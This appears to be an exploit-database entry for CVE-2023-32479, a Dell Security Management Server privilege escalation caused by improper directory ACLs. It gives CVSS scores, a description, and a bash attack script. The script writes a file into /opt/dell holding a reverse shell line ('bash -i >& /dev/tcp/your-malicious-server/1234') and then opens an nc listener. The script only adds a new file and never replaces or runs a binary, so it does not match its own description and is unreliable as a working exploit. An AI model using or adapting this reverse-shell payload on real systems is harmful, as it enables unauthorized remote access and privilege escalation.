CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
9.0%
# Exploit Title: [title] Dell Security Management Server versions prior to
11.9.0
# Exploit Author: [author] Amirhossein Bahramizadeh
# CVE : [if applicable] CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
Management
Server versions prior to 11.9.0 contain privilege escalation vulnerability
due to improper ACL of the non-default installation directory. A local
malicious user could potentially exploit this vulnerability by replacing
binaries in installed directory and taking the reverse shell of the system
leading to Privilege Escalation.
#!/bin/bash
INSTALL_DIR="/opt/dell"
# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
# Replace a binary in the installed directory with a malicious binary that opens a reverse shell
echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
chmod +x "$INSTALL_DIR/dell-exploit"
# Wait for the reverse shell to connect to your malicious server
nc -lvnp 1234
fi